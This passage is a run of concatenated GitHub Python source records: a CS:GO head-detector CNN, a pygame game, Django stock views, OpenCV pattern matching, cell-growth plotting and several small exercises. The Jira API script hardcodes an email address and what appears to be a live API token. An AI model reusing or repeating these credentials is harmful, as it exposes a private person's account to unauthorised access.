n_features, kernel_size = 5, stride = 1, padding = 2)\r\n\t\tself.dropout1 = nn.Dropout(0.5)\r\n\t\tself.linear1 = nn.Linear(112*112*n_features, 100)\r\n\t\tself.linear2 = nn.Linear(100, 3)\r\n\t\t#x, y, probability\r\n\t\r\n\tdef forward(self, x):\r\n\t\tx = F.relu(self.conv1(x))\r\n\t\tx = F.relu(self.conv2(x))\r\n\t\tx = F.relu(self.conv3(x))\r\n\t\tx = x.view(-1, 112*112*n_features)\r\n\t\tx = F.tanh(self.linear1(x))\r\n\t\t#print(x)\r\n\t\t#print(x.shape)\r\n\t\tx = self.dropout1(x) \r\n\t\tx = F.tanh(self.linear2(x))\r\n\t\t#x[:, 2] = (x[:, 2]*2) - 1\r\n\t\t#print(x)\r\n\t\treturn x\r\n\r\nprint(\"initializing_model...\", end = \"\\r\")\r\n\r\n#criterion = nn.BCEWithLogitsLoss() \r\ncriterion = nn.MSELoss(reduce = \"sum\")\r\nmodel = Head_hunter(n_features, input_chanels, batch_size).to(device)\r\nparameters = model.parameters()\r\noptimizer = optim.Adam(parameters, lr = lr)\r\n\r\nprint(\"starting_training...\", end = \"\\r\")\r\n\r\nif load_m:\r\n\tload_mod(torch.load(model_path))\r\n\r\n\r\nfor epoch in range(epochs):\r\n\trunning_loss = 0.0\r\n\tcheckpoint = {'state_dictionary' : model.state_dict(), 'optimizer': optimizer.state_dict()}\r\n\tif epoch % 5 == 0:\r\n\t\tsave_mod(checkpoint)\r\n\tfor idx, [image, label] in enumerate(training_loader):\r\n\t\t#print(image.shape)\r\n\r\n\t\timage = image.to(device)\r\n\t\tlabel = label.to(device)\r\n\r\n\t\toutput = model(image).double().to(device)\r\n\r\n\t\tloss = criterion(output, label)\r\n\r\n\t\trunning_loss += loss.item()\r\n\t\tprint(\"epoch: \", epoch, \" iter: \", idx, \" loss: \", running_loss/(idx+1), end = \"\\r\")\r\n\t\t\r\n\t\tloss.backward()\r\n\t\toptimizer.step()\r\n\t\toptimizer.zero_grad()\r\n\r\n\tif epoch % 5 == 0:\r\n\t\tvalidation_loss = 0.0\r\n\t\twith torch.no_grad():\r\n\t\t\tfor idx, [val_img, label] in enumerate(validation_loader):\r\n\r\n\t\t\t\tval_img = val_img.to(device)\r\n\t\t\t\t#print(val_img.shape)\r\n\t\t\t\tlabel = label.to(device)\r\n\r\n\t\t\t\toutput = model(val_img)\r\n\t\t\t\tloss = criterion(output, label)\r\n\t\t\t\tvalidation_loss += loss.item()\r\n\r\n\t\t\tprint(\"validation_iter: \", idx, \" validation_loss: \", validation_loss/(idx+1))\r\n\r\n\r\nimg = Image.open(dataset_path + \"head (\" + str(182) + \").png\" ).convert(\"L\")\r\nimg = transform_train(img)\r\nimg = img.unsqueeze(0)\r\nplt.imshow(img[0][0])\r\nplt.show()\r\n\r\noutput = model(image).double().to(device)\r\nprint(output*112)\t\t\r\n\t\t\r\n\r\n","repo_name":"BoykoDenis/CSGOAI-head-detector","sub_path":"detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":5550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15210783704","text":"student=[\n{\"name\": \"Joseph\",\"score\":85},\n{\"name\": \"James\",\"score\":70},\n{\"name\": \"Mary\",\"score\":90},\n{\"name\": \"Tony\",\"score\":65},\n{\"name\": \"Tuu\",\"score\":49},\n{\"name\": \"Pom\",\"score\":51},\n]\nfor i in student:\n if i[\"score\"] >=80:\n for key,vale in i.items():\n print(key,vale)\n print(\"grade4\")\n elif i[\"score\"]>=70:\n for key,vale in i.items():\n print(key,vale)\n print(\"grade3\")\n elif i[\"score\"]>=60:\n for key,vale in i.items():\n print(key,vale)\n print(\"grade2\")\n elif i[\"score\"]>=50:\n for key,vale in i.items():\n print(key,vale)\n print(\"grade1\")\n elif i[\"score\"]<50:\n for key,vale in i.items():\n print(key,vale)\n print(\"grade0\")\n#ชวิศ กานต์ขจรเดช 6/14 เลขที่ 24 ","repo_name":"kusdsv/python14","sub_path":"data-loop.py","file_name":"data-loop.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34953387724","text":"import math\n\ndef func(tar, a):\n for i, l in enumerate(a):\n expe = int(math.sqrt(tar**2 - l**2))\n b = a[i+1:]\n if expe in b:\n return tar + l + b[b.index(expe)]\n \n return 0\n\nn = 4\na = [4, 5, 10, 20]\n\n#昇順にソート\na.sort(reverse=True)\n#上から見ていく\nfor i,tar in enumerate(a):\n res = func(tar, a[i+1:])\n if res != 0:\n break\n\nprint(res)","repo_name":"ririron/pgccb","sub_path":"ch1/triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15982921235","text":"'''\nSpaceship pygame\nAuthor: Caleb Han\n'''\n\n# imports\nimport pygame\nimport random\n\n# get keystrokoes\nfrom pygame.locals import (\n K_UP,\n K_DOWN,\n K_LEFT,\n K_RIGHT,\n K_ESCAPE,\n KEYDOWN,\n QUIT,\n)\n\n# set up screen\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\n\n# set up player class\nclass Player(pygame.sprite.Sprite):\n def __init__(self):\n super(Player, self).__init__()\n self.surf = pygame.Surface((75, 25))\n self.surf.fill((225, 225, 225))\n self.rect = self.surf.get_rect()\n \n # move the player\n def update(self, pressed_keys):\n if pressed_keys[K_UP]:\n self.rect.move_ip(0, -1)\n if pressed_keys[K_DOWN]:\n self.rect.move_ip(0, 1)\n if pressed_keys[K_LEFT]:\n self.rect.move_ip(-1, 0)\n if pressed_keys[K_RIGHT]:\n self.rect.move_ip(1, 0)\n\n if self.rect.left < 0:\n self.rect.left = 0\n if self.rect.right > SCREEN_WIDTH:\n self.rect.right = SCREEN_WIDTH\n if self.rect.top <= 0:\n self.rect.top = 0\n if self.rect.bottom >= SCREEN_HEIGHT:\n self.rect.bottom = SCREEN_HEIGHT\n\n# set up enemy class\nclass Enemy(pygame.sprite.Sprite):\n def __init__(self):\n super(Enemy, self).__init__()\n self.surf = pygame.Surface((20, 10))\n self.surf.fill((255, 255, 255))\n self.rect = self.surf.get_rect(\n center=(\n random.randint(SCREEN_WIDTH + 20, SCREEN_WIDTH + 100),\n random.randint(0, SCREEN_HEIGHT),\n )\n )\n self.speed = random.randint(5, 20)\n\n # move enemy\n def update(self):\n self.rect.move_ip(-self.speed, 0)\n if self.rect.right < 0:\n self.kill()\n\n# run game\npygame.init()\n\n# set up a clock\nclock = pygame.time.Clock()\n\n# set up the screen\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n\n# add an enemy\nADDENEMY = pygame.USEREVENT + 1\npygame.time.set_timer(ADDENEMY, 250)\n\n# add player\nplayer = Player()\n\n# set up variables\nenemies = pygame.sprite.Group()\nall_sprites = pygame.sprite.Group()\nall_sprites.add(player)\n\n# get main running loop\nrunning = True\nwhile running:\n # quit game or add enemy events\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n running = False\n elif event.type == QUIT:\n running = False\n\n elif event.type == ADDENEMY:\n new_enemy = Enemy()\n enemies.add(new_enemy)\n all_sprites.add(new_enemy)\n\n # get pressed keys and move\n pressed_keys = pygame.key.get_pressed()\n player.update(pressed_keys)\n \n # move enemies\n enemies.update()\n \n # screen manipulation\n screen.fill((0, 0, 0))\n surf = pygame.Surface((50, 50))\n surf.fill((0, 0, 0))\n\n # sprite manipulation\n for entity in all_sprites:\n screen.blit(entity.surf, entity.rect)\n\n # detect collision\n if pygame.sprite.collideandy(player, enemies):\n player.kill()\n running = False\n\n pygame.display.flip()\n clock.tick(1)\n","repo_name":"calebyhan/CalebHan","sub_path":"Projects and Applications/spaceship_pygame/spaceship_pygame.py","file_name":"spaceship_pygame.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"42086019496","text":"from django.http import HttpResponse, HttpRequest\nfrom .models import Subscription\nfrom .Utils import batch_get_symbol_price\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .forms import CustomUserForm, SubscriptionForm\n\n\n# Create your views here.\ndef user_home_page(request: HttpRequest) -> render:\n if not request.user.is_authenticated:\n return redirect(\"/users/login/\")\n subscribed_stock = request.user.symbols.all()\n query = [stock.symbol for stock in subscribed_stock]\n prices = batch_get_symbol_price(query)\n\n context = {'symbols': prices}\n\n return render(request, 'home.html', context)\n\n\ndef register_user(request: HttpRequest) -> render:\n if request.method == 'POST':\n user_form = CustomUserForm(request.POST)\n if user_form.is_valid():\n user_form.save()\n messages.success(request, \"Registration successful.\")\n return redirect('/users/login/')\n else:\n messages.success(request, \"Registration not successful.\")\n else:\n user_form = CustomUserForm()\n return render(request, './registration/register.html', {'form': user_form})\n\n\ndef delete_subscription(request: HttpRequest, symbol: str) -> render:\n if not request.user.is_authenticated:\n return redirect(\"/users/login/\")\n\n symbol = symbol.upper()\n target = Subscription.objects.filter(user=request.user, symbol=symbol)\n if len(target) > 0:\n target[0].delete()\n\n return redirect(\"/stock/user_home_page\")\n\n\ndef subscribe_stocks(request: HttpRequest) -> HttpResponse:\n if not request.user.is_authenticated:\n return redirect(\"/users/login/\")\n\n if request.POST:\n target_stock = SubscriptionForm(request.POST)\n\n if target_stock.is_valid():\n symbol = target_stock.cleaned_data[\"symbol\"].upper()\n if not Subscription.objects.filter(user=request.user, symbol=symbol).exists():\n entry = Subscription(symbol=symbol, user=request.user)\n entry.save()\n return redirect(\"/stock/user_home_page\")\n\n context = {\"form\": SubscriptionForm()}\n return render(request, \"subscribe.html\", context)\n\n\ndef index(request):\n return HttpResponse(\"Hello, world. You're at the stock index.\")\n","repo_name":"Sheldonsu28/StockPriceDjango","sub_path":"source code/stock/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35548692792","text":"def findDup1(nums):\n nums.sort()\n for i in range(1, len(nums)):\n if nums[i] == nums[i-1]:\n return nums[i]\n\nnums = [1,3,4,2,2]\nprint(findDup1(nums))\n\n# O(nlogn) time\n# O(1)\n\ndef findDup2(nums):\n visited = set()\n for num in nums:\n if num in visited:\n return num\n visited.add(num)\n\nprint(findDup2(nums))\n\n# O(n) time\n# O(n)","repo_name":"davidcparkk/prep_work","sub_path":"Python/leetcode/287_find_dup.py","file_name":"287_find_dup.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38788036453","text":"\"\"\"\nListing 2.55\n\nThe bisect module provides two ways to handle repeats. New values\ncan be inserted either to the left of existing values, or to the\nright. The insort() function is actually an alias for insort_right()\nwhich inserts an item after the existing value\nThe corresponding function insort_left inserts an item before the\nexisting value\n\"\"\"\nimport bisect\n\n\ndef main():\n values = [14, 85, 77, 26, 50, 45, 66, 79, 10, 3, 84, 77, 1]\n\n print(\"New Pos Contents\")\n print(\"___ ___ ________\")\n\n l = []\n\n for i in values:\n position = bisect.bisect_left(l, i)\n bisect.insort_left(l, i)\n print(f\"{i:3} {position:3} {l}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"8563a236e65cede7b14220e65c70ad5718144a3/python3-standard-library-solutions","sub_path":"Chapter02/0055_bisect_example2.py","file_name":"0055_bisect_example2.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"22404833706","text":"\nimport requests\n\n\nurl = \"https://sample-project-anirudh.atlassian.net/rest/api/3/search\"\n\nheaders = {\n \"Accept\": \"application/json\",\n \"Content-Type\": \"application/json\"\n}\n\nquery = {\n 'jql': 'project = PS'\n}\n\nresponse_=requests.get(url, headers=headers, params=query, auth=('anirudhpunaruru1999@gmail.com', 'ufrEHjE9u76HvTplXckS1857'))\ndata= response_.json()\nissues= data['issues']\nfor issue in issues:\n key= issue['key']\n issue_url= 'https://sample-project-anirudh.atlassian.net/rest/api/3/issue/'+key\n res= requests.get(issue_url, headers=headers, auth=('anirudhpunaruru1999@gmail.com', 'ufrEHjE9u76HvTplXckS1857'))\n data= res.json()\n print(data['fields']['status']['name'])\n\n\n\n","repo_name":"anirudh-punaruru/jiraApiInVscode","sub_path":"jiraApi.py","file_name":"jiraApi.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43414032215","text":"import cv2\r\nimport numpy as np\r\nimport os\r\n\r\nclass ImageProcessing:\r\n \r\n def __init__(self):\r\n super().__init__()\r\n\r\n def write_image_file(self, path, img):\r\n cv2.imwrite(path, img)\r\n\r\n def bcg_lookup(self, img, alpha, beta):\r\n img = np.uint8( np.clip ( ( alpha * img + beta) , 0, 255))\r\n return img\r\n\r\n def gray_scale(self, img):\r\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\r\n return img\r\n\r\n def binarize(self, gray_img, min_valve = 150 , max_valve = 255 , inverse = True):\r\n if(inverse):\r\n _, img = cv2.threshold(gray_img, min_valve, max_valve, cv2.THRESH_BINARY_INV)\r\n else:\r\n _, img = cv2.threshold(gray_img, min_valve, max_valve, cv2.THRESH_BINARY) \r\n return img\r\n\r\n def morphology_fill(self, binary_img):\r\n img = binary_img.copy()\r\n img_inv = img.copy()\r\n highth, width = img.shape\r\n #print(\"highth = \", highth, \"width = \", width)\r\n mask = np.zeros((highth + 2, width + 2), np.uint8)\r\n cv2.floodFill(img_inv, mask, (0, 0), 255)\r\n img_inv = cv2.bitwise_not(img_inv)\r\n img = cv2.bitwise_or(img, img_inv)\r\n #cv2.imshow(\"img_inv\", img_inv) // fill\r\n #cv2.imshow(\"img_\", img)\r\n return img\r\n\r\n def erode_dilate(self, img, erode_or_dialate, iteration, kernal = (5, 5)):\r\n kernal = np.ones((kernal), np.uint8)\r\n if erode_or_dialate:\r\n img_out = cv2.erode(img, kernal, iterations = iteration)\r\n else:\r\n img_out = cv2.dilate(img, kernal, iterations = iteration)\r\n return img_out\r\n\r\n def remove_small_object(self, img, min_size):\r\n nb_obj, output, status, _ = cv2.connectedComponentsWithStats(img, connectivity=8)\r\n sizes = status[1 : -1]\r\n nb_obj = nb_obj - 1\r\n img_out = np.zeros((output.shape), dtype = np.uint8)\r\n for i in range(0, nb_obj):\r\n if sizes[i] >= min_size:\r\n img_out[output == i + 1] = 255\r\n nb_obj , _ , _ , _ = cv2.connectedComponentsWithStats(img_out, connectivity=8)\r\n return img_out, nb_obj\r\n \r\n def canny(self, img, kernal = (5, 5), threshold1 = 30, threshold2 = 100):\r\n blur = cv2.GaussianBlur(img, kernal, 0)\r\n edged = cv2.Canny(blur, threshold2, threshold1)\r\n return edged\r\n\r\n def draw_contours(self, edged, img, area_size_max = 50000, area_size_min = 4000):\r\n cnts_array = np.zeros((8,4))\r\n\r\n (cnts, _) = cv2.findContours(edged.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\n contours = img.copy()\r\n cv2.drawContours(contours, cnts, -1, (0, 255, 0), 1)\r\n #cv2.imshow(\"contours\", contours)\r\n i = 0\r\n for(_, c) in enumerate(cnts):\r\n if (cv2.contourArea(c) < area_size_min) or (cv2.contourArea(c) > area_size_max):\r\n continue\r\n (x, y, w, h) = cv2.boundingRect(c)\r\n if((x + y + w + h) == 0):\r\n break\r\n else:\r\n cnts_array[i][0] = x\r\n cnts_array[i][1] = y\r\n cnts_array[i][2] = x + w\r\n cnts_array[i][3] = y + h\r\n cv2.rectangle(img , (x , y) , (x + w , y + h) , (0 , 255 ,0) , 2)\r\n i += 1\r\n if(i >= np.size(cnts_array, 0)):\r\n break\r\n\r\n cnts_array = cnts_array[0: i, 0:4]\r\n cv2.imshow(\" rect_finded \" , img)\r\n return cnts, cnts_array\r\n\r\n def get_subROI(self, img, rect_tuple):\r\n sub_img = img.copy()\r\n (x1, y1, x2, y2) = rect_tuple\r\n if(x1 == 0 and x2 == 0 and y1 == 0 and y2 == 0):\r\n sub_img = img\r\n else:\r\n sub_img = sub_img[int(y1): int(y2), int(x1) : int(x2)]\r\n return sub_img\r\n\r\n def histogram(self, img):\r\n hist = cv2.calcHist([img], [0], None, [256], [0, 256])\r\n sum_hist = 0\r\n c = 0\r\n for value in hist:\r\n sum_hist += (c * value)\r\n c += 1\r\n\r\n if(c == 0):\r\n sum_hist = 0\r\n else:\r\n sum_hist /= (img.shape[0] * img.shape[1])\r\n\r\n return sum_hist\r\n\r\n def get_image_bool_matrix(self, img, matrix_size = 9, valve = 128):\r\n img_bool_matrix = np.full((matrix_size, matrix_size), False, dtype=bool)\r\n pixel_width = img.shape[1] / matrix_size\r\n pixel_highth = img.shape[0] / matrix_size\r\n for iy in range (0, matrix_size):\r\n for ix in range(0, matrix_size):\r\n sub_image_rect = (pixel_width * ix, pixel_highth * iy, \r\n pixel_width + pixel_width * ix, \r\n pixel_highth + pixel_highth * iy)\r\n if(self.histogram(self.get_subROI(img, sub_image_rect)) >= valve):\r\n img_bool_matrix[iy][ix] = True\r\n else:\r\n img_bool_matrix[iy][ix] = False\r\n return img_bool_matrix\r\n\r\nclass AdvanceImageProcessing(ImageProcessing):\r\n def get_patterns_bool_matrix(self, patterns_path, number_of_matrix = 8, matrix_size = 9):\r\n tmp_patterns_bool_matrix = np.full((number_of_matrix, matrix_size, matrix_size), False, dtype = bool)\r\n i = 0\r\n for path in patterns_path:\r\n img = cv2.imread(path)\r\n img = self.gray_scale(img)\r\n img = self.binarize(img, 150, 255, True)\r\n tmp_patterns_bool_matrix[i] = self.get_image_bool_matrix(img, matrix_size, 128)\r\n i += 1\r\n i = 0\r\n patterns_bool_matrix = np.full((number_of_matrix, matrix_size - 4 , matrix_size - 4), False, dtype = bool)\r\n for bool_matrix in tmp_patterns_bool_matrix:\r\n bool_matrix = np.delete(bool_matrix, [0, 1, 7, 8], 0)\r\n bool_matrix = np.delete(bool_matrix, [0, 1, 7, 8], 1)\r\n patterns_bool_matrix[i] = bool_matrix\r\n i += 1\r\n return patterns_bool_matrix\r\n\r\n def get_image_pattern_contours(self, source_img, threshold_min_valve = 150, threshold_max_valve = 255, canny_kernal = (5, 5), canny_threshold1 = 30, canny_threshold2 = 100, show = False):\r\n source_img = self.gray_scale(source_img)\r\n bin_img = self.binarize(source_img, threshold_min_valve, threshold_max_valve, True)\r\n #morphology_img = self.morphology_fill(bin_img)\r\n edged_img = self.canny(bin_img, canny_kernal, canny_threshold1, canny_threshold2)\r\n if show:\r\n cv2.imshow(\"gray_scale\", source_img)\r\n cv2.imshow(\"binary_img\", bin_img)\r\n cv2.imshow(\"edged_img\", edged_img)\r\n\r\n _ , cnts_array = self.draw_contours(edged_img, cv2.cvtColor(source_img, cv2.COLOR_GRAY2RGB))\r\n cnts_array = np.flip(cnts_array, 0)\r\n return cnts_array\r\n\r\n \r\n def get_pattern(self, source_img, patterns_bool_matrix, matrix_size = 9, valve = 128):\r\n source_bool_matrix = np.full((matrix_size, matrix_size), False, dtype = bool)\r\n pattern_score_matrix = np.zeros((5,5)) #Create a zeros array to compute the score of pattern compare.\r\n source_bool_matrix = self.get_image_bool_matrix(source_img, matrix_size, valve) #Get bool matrix from image\r\n global_score = 0\r\n pattern_index = 0\r\n def matrix_convolotion(source_matrix, pattern_matrix):\r\n score = 0\r\n tmp_source_matrix = np.full((matrix_size - 4, matrix_size - 4), False, dtype = bool)\r\n score_source_matrix = np.copy(tmp_source_matrix)\r\n for ix in range(1, 4):\r\n for iy in range(1, 4):\r\n tmp_source_matrix = source_matrix[ix:ix+5, iy:iy+5]\r\n score_source_matrix = np.logical_or(np.logical_and(tmp_source_matrix, pattern_matrix), np.logical_and(np.bitwise_not(tmp_source_matrix), np.bitwise_not(pattern_matrix)))\r\n local_score = np.sum(score_source_matrix)\r\n if(local_score > score):\r\n score = local_score\r\n else:\r\n score = score\r\n return score\r\n loop_index = 0\r\n for pattern in patterns_bool_matrix:\r\n score_return = matrix_convolotion(source_bool_matrix, pattern)\r\n if(score_return > global_score):\r\n global_score = score_return\r\n pattern_index = loop_index\r\n else:\r\n global_score = global_score\r\n loop_index += 1\r\n\r\n return pattern_index\r\n","repo_name":"yuyun-liu/-Python-PatternDetect","sub_path":"Lib/GetPattern.py","file_name":"GetPattern.py","file_ext":"py","file_size_in_byte":8416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"464720185","text":"# word_search.py\nfrom typing import List\n\n\ndef exist(board: List[List[str]], word: str) -> bool:\n dx = [-1, 1, 0, 0]\n dy = [0, 0, -1, 1]\n rows = len(board)\n cols = len(board[0])\n\n def backtrack(i, y, x):\n if i == len(word):\n return True\n if y < 0 or y >= rows or x < 0 or x >= cols:\n return False\n if board[y][x] != word[i]:\n return False\n\n board[y][x] = \"#\"\n ret = False\n for k in range(len(dx)):\n ny = y + dy[k]\n nx = x + dx[k]\n if backtrack(i + 1, ny, nx):\n ret = True\n break\n board[y][x] = word[i]\n\n return ret\n\n for y in range(rows):\n for x in range(cols):\n if backtrack(0, y, x):\n return True\n\n return False\n\n\nif __name__ == \"__main__\":\n board = [\n [\"A\", \"B\", \"C\", \"E\"],\n [\"S\", \"F\", \"C\", \"S\"],\n [\"A\", \"D\", \"E\", \"E\"],\n ]\n\n print(\"=====Example 1=====\")\n word = \"ABCCED\"\n result = exist(board, word)\n correct_result = True\n print(f\"Expected:\\n\\t{correct_result}\")\n print(f\"Output:\\n\\t{result}\")\n\n print(\"=====Example 2=====\")\n word = \"SEE\"\n result = exist(board, word)\n correct_result = True\n print(f\"Expected:\\n\\t{correct_result}\")\n print(f\"Output:\\n\\t{result}\")\n\n print(\"=====Example 3=====\")\n word = \"ABCB\"\n result = exist(board, word)\n correct_result = False\n print(f\"Expected:\\n\\t{correct_result}\")\n print(f\"Output:\\n\\t{result}\")\n\n board = [[\"a\"]]\n\n print(\"=====Example 4=====\")\n word = \"a\"\n result = exist(board, word)\n correct_result = True\n print(f\"Expected:\\n\\t{correct_result}\")\n print(f\"Output:\\n\\t{result}\")\n","repo_name":"giwankim/algo","sub_path":"leetcode/79-word-search/word_search.py","file_name":"word_search.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43721257112","text":"import tkinter as tk\nimport tkinter as ttk\nimport numpy as np\nimport math\nfrom tkinter import messagebox as msg \n\n#create GUI\nwin = tk.Tk()\nwin.title(\"SIMULASI BUFFON-NEDDLE\")\n\nttk.Label(win, text=\"SIMULASI BUFFON-NEDDLE\").grid(column=1, row=0)\n\ndef _msgBox():\n \"\"\"Menghitung peluang jarum terkena garis\"\"\"\n n1=0\n nt=0\n dr1 = int(d1.get())\n dr2 = int(d2.get())\n dr3 = int(d3.get())\n dr4 = int(d4.get())\n dr5 = int(d5.get())\n total_d= dr1+dr2+dr3+dr4+dr5\n\n while nt<=int(N.get()):\n r1=np.random.uniform()\n r2=np.random.uniform()\n tetha=r2*math.pi\n \n if r1 <= dr1/total_d:\n a=0.5*r1*dr1\n elif r1>dr1/total_d and r1<=dr2/total_d:\n a=0.5*r1*(dr1+dr2) \n elif r1>dr2/total_d and r1<=dr3/total_d:\n a=0.5*r1*(dr1+dr2+dr3)\n elif r1>dr3/total_d and r1<=dr4/total_d:\n a=0.5*r1*(dr1+dr2+dr3+dr4)\n elif r1>dr4/total_d and r1<=dr5/total_d:\n a=0.5*r1*(dr1+dr2+dr3+dr4+dr5)\n\n if a<= int(l.get())*0.5*math.sin(tetha):\n n1 +=1\n nt +=1\n p=n1/int(N.get())\n msg.showinfo('Peluangnya adalah',str(p))\n \nttk.Label(win, text=\"Masukkan jarak garis 1 dan 2 : \").grid(column=0, row=1)\nd1=tk.StringVar()\nd1_entered= ttk.Entry(win, width=12, textvariable=d1)\nd1_entered.grid(column=2, row=1)\n\nttk.Label(win, text=\"Masukkan jarak garis 2 dan 3 : \").grid(column=0, row=2)\nd2=tk.StringVar()\nd2_entered= ttk.Entry(win, width=12, textvariable=d2)\nd2_entered.grid(column=2, row=2)\n\nttk.Label(win, text=\"Masukkan jarak garis 3 dan 4 : \").grid(column=0, row=3)\nd3=tk.StringVar()\nd3_entered= ttk.Entry(win, width=12, textvariable=d3)\nd3_entered.grid(column=2, row=3)\n\nttk.Label(win, text=\"Masukkan jarak garis 4 dan 5 : \").grid(column=0, row=4)\nd4=tk.StringVar()\nd4_entered= ttk.Entry(win, width=12, textvariable=d4)\nd4_entered.grid(column=2, row=4)\n\nttk.Label(win, text=\"Masukkan jarak garis 5 dan 6 : \").grid(column=0, row=5)\nd5=tk.StringVar()\nd5_entered= ttk.Entry(win, width=12, textvariable=d5)\nd5_entered.grid(column=2, row=5)\n\nttk.Label(win, text=\"Masukkan panjang jarum : \").grid(column=0, row=6)\nl=tk.StringVar()\nl_entered= ttk.Entry(win, width=12, textvariable=l)\nl_entered.grid(column=2, row=6)\n\nttk.Label(win, text=\"Masukkan banyak jarum : \").grid(column=0, row=7)\nN=tk.StringVar()\nN_entered= ttk.Entry(win, width=12, textvariable=N)\nN_entered.grid(column=2, row=7)\n\nactio=ttk.Button(win, text=\"Proses\", command = _msgBox)\nactio.grid(column=2, row=8)\n\nd1_entered.focus()\nd2_entered.focus()\nd3_entered.focus()\nd4_entered.focus()\nd5_entered.focus()\nl_entered.focus()\nN_entered.focus()\n#start GUI\nwin.mainloop()\n","repo_name":"ramaprasyanto/teknik-simulasi","sub_path":"GUI_SIMULASI_BUFFON-NEDDLE.py","file_name":"GUI_SIMULASI_BUFFON-NEDDLE.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28594733447","text":"#13.ROT.cipher.py\n\nEnglish = ['a', 'b', 'c', 'd', 'e',\t'f', 'g', 'h', 'i',\t'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\ndef rotate(alpha, m):\n return alpha[m:] + alpha[:m]\n\nm = int(input('Rotate: '))\nROTN = rotate(English, m)\ntranslator = dict(zip(English, ROTN))\nprint(translator)\n\nmessage = input('What is your message? ')\ndef encode(message):\n output = \"\"\n for i in message:\n #print(output)\n output += translator[i]\n return output\nprint(encode(message))\n\n\n#notes from class\n# for char in message:\n# index = alphabet.find(char)\n# encoded += rot13[index]\n# return encoded\n\n\n#Xavier's help.\n# translator = dict(zip(English, ROTN))\n# message = \"abcdef\"\n# def encode(message):\n# output = \"\"\n# for i in message:\n# #print(output)\n# output += translator[i]\n# return output\n# print(encode(message))\n# print(list(translator.keys()))\n\n# message = \"Hello\"\n# def encode(message):\n# for char in English == char in ROTN\n# return message\n\n\n\n\n\n#encrypting\n# message = input(\"What is your message? \")\n# key = 3\n#\n# # for symbol in message:\n# if symbol.isalpha():\n# num = ord(symbol)\n# num += key\n#\n# if symbol.isupper():\n# if num >ord('Z'):\n# num -= 26\n# elif num += 26\n# elif symbol.islower():\n# if num > ord('z'):\n# num -= 26\n# elif num < ord('a')\n# num +=26\n#\n# transalated += chr(num)\n# else:\n# transalated += symbol\n# return transalated\n","repo_name":"rafawelsh/CodeGuildLabs","sub_path":"python/Python labs/13.ROT.cipher.py","file_name":"13.ROT.cipher.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2988502471","text":"# %%\nimport sys\nsys.path.append('../scripts')\nimport cellMorphHelper\nfrom cellMorph import imgSegment\n\nimport pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nimport pandas as pd\n\nfrom skimage.measure import regionprops\nfrom skimage.io import imread\n\nimport datetime\n# %%\nclasses = pickle.load(open('../data/fullClassificationAccuracy.pickle',\"rb\"))\n# %%\nwell = 'E7'\n\nclasses = [classification for classification in classes if classification.well == 'E7']\n\n# %%\nactualGrowth = {}\npredictedGrowth = {}\nfor classification in classes:\n date = classification.date\n\n pred0 = sum(np.array(classification.predClasses) == 0)\n pred1 = sum(np.array(classification.predClasses) == 1)\n \n actual0 = sum(np.array(classification.actualClasses) == 0)\n actual1 = sum(np.array(classification.actualClasses) == 1)\n\n if date not in predictedGrowth.keys():\n predictedGrowth[date] = [0, 0]\n actualGrowth[date] = [0, 0]\n \n predictedGrowth[date][0] += pred0\n predictedGrowth[date][1] += pred1\n\n actualGrowth[date][0] += actual0\n actualGrowth[date][1] += actual1\n\n\npredictedGrowth = pd.DataFrame(predictedGrowth).T.reset_index()\npredictedGrowth.columns = ['date', 0, 1]\n\npredictedGrowth['date'] = predictedGrowth['date'] - min(predictedGrowth['date'])\npredictedGrowth['date'] = predictedGrowth['date'].dt.total_seconds()/3600\n\nplt.rcParams.update({'font.size': 18})\nfig, ax = plt.subplots(figsize = (8, 6))\nfor spine in ['top', 'right']:\n ax.spines[spine].set_visible(False)\nplt.scatter(predictedGrowth['date'], predictedGrowth[0], c = 'red', label = 'ESAM (-)')\nplt.scatter(predictedGrowth['date'], predictedGrowth[1], c = 'green', label = 'ESAM (+)')\nplt.xlabel('Hours')\nplt.ylabel('Predicted Growth')\nplt.savefig('../results/figs/predictedCocultureGrowth.png', dpi=600)\nplt.show()\n\nactualGrowth = pd.DataFrame(actualGrowth).T.reset_index()\nactualGrowth.columns = ['date', 0, 